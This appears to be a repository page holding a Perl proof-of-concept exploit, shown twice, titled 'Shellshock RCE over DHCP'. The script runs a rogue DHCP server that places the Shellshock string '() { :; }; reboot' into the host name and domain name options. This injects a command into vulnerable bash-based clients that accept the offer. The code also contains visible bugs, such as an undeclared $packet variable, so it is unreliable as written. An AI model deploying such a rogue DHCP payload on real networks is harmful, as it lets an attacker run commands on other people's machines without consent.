timb-machine/Shellshock RCE over DHCP

## Shellshock RCE over DHCP
#!/usr/bin/perl
# largely purloined from http://www.perlmonks.org/?node_id=1093916 as my PoC for the old options overflow proved too messy^wPerlish to rework - [machine]

use strict;

use IO::Socket;
use Net::DHCP::Packet;
use Net::DHCP::Constants;

my $serveripaddress = "10.10.10.1";
my $clientipaddress = "10.10.10.10";
my $subnetmask = "255.255.255.0";

my $sockethandle = IO::Socket::INET->new(Proto => "udp", LocalAddr => "255.255.255.255", LocalPort => 67) or die $@;

while(1) {
	my $requestdata;
	$sockethandle->recv($requestdata, 4096);
	my $dhcppacket = new Net::DHCP::Packet($requestdata);
	my $messagetype = $packet->getOptionValue(DHO_DHCP_MESSAGE_TYPE());
	if ($messagetype eq DHCPDISCOVER()) {
		sendoffer($dhcppacket);
	} elsif ($messagetype eq DHCPREQUEST()) {
		sendack($dhcppacket);
	}
}

sub sendoffer {
	my $dhcprequestdata = @_;
	my $sockethandle = IO::Socket::INET->new(Proto => "udp", LocalAddr => $serveripaddress, LocalPort => 67, PeerAddr => "255.255.255.255", PeerPort => 68, Broadcast => 1) or die $@;
	my $dhcpresponsedata = new Net::DHCP::Packet(Op => BOOTREPLY(), Xid => $dhcprequestdata->xid(), Flags => $dhcprequestdata->flags(), Ciaddr => $dhcprequestdata->ciaddr(), Yiaddr => $clientipaddress, Siaddr => $serveripaddress, Giaddr => $dhcprequestdata->giaddr(), Chaddr => $dhcprequestdata->chaddr(), DHO_DHCP_MESSAGE_TYPE() => DHCPOFFER());
	$dhcpresponsedata->addOptionValue(DHO_SUBNET_MASK(), $subnetmask);
	$dhcpresponsedata->addOptionValue(DHO_NAME_SERVERS, $serveripaddress);
	$dhcpresponsedata->addOptionValue(DHO_HOST_NAME, "() { :; }; reboot");
	$dhcpresponsedata->addOptionValue(DHO_DOMAIN_NAME, "() { :; }; reboot");
	$sockethandle->send($dhcpresponsedata->serialize()) or die $!;
	print STDERR "sent offer\n";
}

sub sendack {
	print STDERR "sent ack\n";
}
	#!/usr/bin/perl
	# largely purloined from http://www.perlmonks.org/?node_id=1093916 as my PoC for the old options overflow proved too messy^wPerlish to rework - [machine]

	use strict;

	use IO::Socket;
	use Net::DHCP::Packet;
	use Net::DHCP::Constants;

	my $serveripaddress = "10.10.10.1";
	my $clientipaddress = "10.10.10.10";
	my $subnetmask = "255.255.255.0";

	my $sockethandle = IO::Socket::INET->new(Proto => "udp", LocalAddr => "255.255.255.255", LocalPort => 67) or die $@;

	while(1) {
	my $requestdata;
	$sockethandle->recv($requestdata, 4096);
	my $dhcppacket = new Net::DHCP::Packet($requestdata);
	my $messagetype = $packet->getOptionValue(DHO_DHCP_MESSAGE_TYPE());
	if ($messagetype eq DHCPDISCOVER()) {
	sendoffer($dhcppacket);
	} elsif ($messagetype eq DHCPREQUEST()) {
	sendack($dhcppacket);
	}
	}

	sub sendoffer {
	my $dhcprequestdata = @_;
	my $sockethandle = IO::Socket::INET->new(Proto => "udp", LocalAddr => $serveripaddress, LocalPort => 67, PeerAddr => "255.255.255.255", PeerPort => 68, Broadcast => 1) or die $@;
	my $dhcpresponsedata = new Net::DHCP::Packet(Op => BOOTREPLY(), Xid => $dhcprequestdata->xid(), Flags => $dhcprequestdata->flags(), Ciaddr => $dhcprequestdata->ciaddr(), Yiaddr => $clientipaddress, Siaddr => $serveripaddress, Giaddr => $dhcprequestdata->giaddr(), Chaddr => $dhcprequestdata->chaddr(), DHO_DHCP_MESSAGE_TYPE() => DHCPOFFER());
	$dhcpresponsedata->addOptionValue(DHO_SUBNET_MASK(), $subnetmask);
	$dhcpresponsedata->addOptionValue(DHO_NAME_SERVERS, $serveripaddress);
	$dhcpresponsedata->addOptionValue(DHO_HOST_NAME, "() { :; }; reboot");
	$dhcpresponsedata->addOptionValue(DHO_DOMAIN_NAME, "() { :; }; reboot");
	$sockethandle->send($dhcpresponsedata->serialize()) or die $!;
	print STDERR "sent offer\n";
	}

	sub sendack {
	print STDERR "sent ack\n";
	}